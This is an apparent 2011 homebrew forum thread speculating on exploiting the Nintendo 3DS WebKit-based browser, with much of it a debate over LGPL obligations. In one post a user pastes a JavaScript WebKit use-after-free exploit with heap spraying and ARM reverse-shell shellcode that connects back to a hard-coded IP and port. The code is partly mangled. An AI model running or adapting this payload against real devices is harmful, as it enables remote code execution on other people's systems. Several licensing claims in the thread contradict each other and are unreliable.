Internet Browser built on open source software.

Discussion in '3DS - Flashcards & Custom Firmwares' started by LinkReincarnate, Jun 10, 2011.

  1. LinkReincarnate
    OP

    Newcomer LinkReincarnate Member

    Joined:
    Jun 10, 2011
    Messages:
    10
    Country:
    United States
    So if you look in your manual in the internet browser and select the last section you'll find that the internet browser (or at least components of it) is licensed as LGPL. One of the requirements of an LGPL license is that the source code must be made available. The manual says it is available on Nintendo's site but i can't seem to find it anywhere. This code may or may not have an exploitable weakness. (I know how to code but I am a newb at reverse engineering so i may be all wet on that point.) Anyone want to poke around on Nintendo's site to try and help me find it?
     


  2. ccfreak2k

    Newcomer ccfreak2k Advanced Member

    Joined:
    May 3, 2011
    Messages:
    53
    Country:
    United States
    It's almost certainly for one or more libraries, like libcurl. These kinds of libraries have been around a long time and have a very wide deployment, thus making them very well-tested.

    That is to say, the source code would be in one of the included libraries and not the actual browser itself.
     
  3. Spoom

    Newcomer Spoom Newbie

    Joined:
    Mar 30, 2009
    Messages:
    8
    Country:
    Canada
    If it's anything like the Wii, it's probably a compact version of Opera. Opera is not open source, so the person above is probably right; the code is likely to open source networking components, which have been examined by thousands of developer eyes over a long period of time. Finding an exploitable weakness in them is not likely.
     
  4. koloss

    Newcomer koloss Newbie

    Joined:
    Apr 8, 2011
    Messages:
    6
    Country:
    Spain
    In 3dbrew we can see:

    The 3D Internet Browser is Netfront Browser NX v1.0 based on WebKit engine.
     
  5. Dash_2

    Member Dash_2 Hello I'm Dash!

    Joined:
    Jun 6, 2011
    Messages:
    130
    Location:
    Melbourne, Florida!
    Country:
    Panama

    yeah they ditched opera...

    they use the same browser as psp and ps3..
     
  6. Spoom

    Newcomer Spoom Newbie

    Joined:
    Mar 30, 2009
    Messages:
    8
    Country:
    Canada
    Ah, sorry. Same deal applies though, not an open source browser.
     
  7. smse

    Newcomer smse Newbie

    Joined:
    Apr 4, 2007
    Messages:
    6
    Country:
    Spain
  8. Spoom

    Newcomer Spoom Newbie

    Joined:
    Mar 30, 2009
    Messages:
    8
    Country:
    Canada
    Ah, it's the source to WebKit.
     
  9. yifan_lu

    Member yifan_lu @yifanlu

    Joined:
    Apr 28, 2007
    Messages:
    571
    Country:
    United States
  10. Harakiri23

    Newcomer Harakiri23 Member

    Joined:
    Jun 28, 2007
    Messages:
    25
    Country:
    United States
    The OP is wrong, you dont need to release anything for L(Lesser) GPL - only for GPL based code
     
  11. Toad King

    Member Toad King GBAtemp Fan

    Joined:
    Aug 19, 2009
    Messages:
    349
    Country:
    United States
    Not entirely correct. If you make changes to LGPL code, you have to make the changes available.
     
  12. LinkReincarnate
    OP

    Newcomer LinkReincarnate Member

    Joined:
    Jun 10, 2011
    Messages:
    10
    Country:
    United States
  13. pachura

    Member pachura GBAtemp Advanced Fan

    Joined:
    Dec 9, 2006
    Messages:
    566
    Country:
    Sorry to be pessimistic, but:

    1. Usually, exploits work only for a specific OS, or at least for a specific CPU family (often, x86). Currently, no one even knows for sure what ARM sits there in 3DS...

    2. The browser is probably sandboxed and operates in an isolated memory area. After all, no one would like a bug in the browser to crash the suspended game...

    3. There'a a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
     
  14. ccfreak2k

    Newcomer ccfreak2k Advanced Member

    Joined:
    May 3, 2011
    Messages:
    53
    Country:
    United States
    Doubtful. The cost for adding that kind of thing to the hardware would be greater than the gain from thwarting such attacks. It's possible that the software may be hardened (here's some examples), but ARM, being embedded, isn't really security-oriented. I'm putting my money on exploits being given only specific contextual access to the hardware.
     
  15. BlazerRazor

    Member BlazerRazor GBAtemp Regular

    Joined:
    Nov 21, 2005
    Messages:
    136
    Country:
    Denmark
    That's a completely wrong statement. Libraries licensed under LGPL does NOT require other thirds parties to hand over their code.
    That is why LGPL was made, to make developers able to use libraries, linking, without needing to share their code.

    Source; http://en.wikipedia.org/wiki/GNU_General_P...d_derived_works http://www.gnu.org/copyleft/lesser.html

    Also, your talk about weaknesses in code is also kinda invalid. The chance of exploitable holes is much slimmer when you consider it is released under LGPL -- people can freely view the code and identify holes. Also, it would be wise of Nintendo to run applications like the browser in some sort of "sandbox" environment, to make sure you can't exploit future holes.
     
  16. Harakiri23

    Newcomer Harakiri23 Member

    Joined:
    Jun 28, 2007
    Messages:
    25
    Country:
    United States
    That is just plain wrong, please do some research and learn about GPL vs LGPL - you can do what you want with LGPL code - no strings attached!
     
  17. LinkReincarnate
    OP

    Newcomer LinkReincarnate Member

    Joined:
    Jun 10, 2011
    Messages:
    10
    Country:
    United States
    For what it's worth Nintendo thinks that they have a requirement to host the code because they are. Whether that is really the case or whether someone at Nintendo f'ed up is irrelevant.
     
  18. LinkReincarnate
    OP

    Newcomer LinkReincarnate Member

    Joined:
    Jun 10, 2011
    Messages:
    10
    Country:
    United States
    It's a custom job that uses very large chunks of arm 9. Arm 9 is in all kinds of android phones and tablets. Any android exploits for webkit?
    Yup They even allow remote code execution. Will that work on the 3ds? Probably not but it does give a general idea of where vulnerabilities may lie and the methodlogies that should be used. BTW that exploit uses javascript. Here is the code for those who are interested.




    function heap()
    {

    var id = document.getElementById("target");
    var attribute = id.getAttributeNode('id');
    nodes = attribute.childNodes;
    document.body.removeChild(id);
    attribute.removeChild(nodes[0]);
    setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };

    var scode = unescape("\u0060\u0060");
    var scode2 = unescape("\u5005\ue1a0");
    var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
    \u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
    shell += unescape("\uae08"); // Port = 2222
    shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
    shell += unescape("\u2000\u2000"); // string terminate

    do
    {
    scode += scode;
    scode2 += scode2;

    } while (scode.length250){
    // alert("freeze");
    nodes[0].textContent}

    }

    }, 0);
    }



    [/p]
     
  19. Masterpaul

    Member Masterpaul GBAtemp Regular

    Joined:
    Aug 13, 2009
    Messages:
    140
    Country:
    Greece
    What your gonna execute though in the 3ds? We dont have anything to execute.
     
  20. NES SNES V.B. N64 G.C. Wii WiiU

    Member NES SNES V.B. N64 G.C. Wii WiiU Now with extra redundancy!

    Joined:
    Feb 10, 2011
    Messages:
    859
    Location:
    The EoF
    Country:
    Australia
    There have been 3DS roms dumped recently. Search in GBAtemp search.
     

Share This Page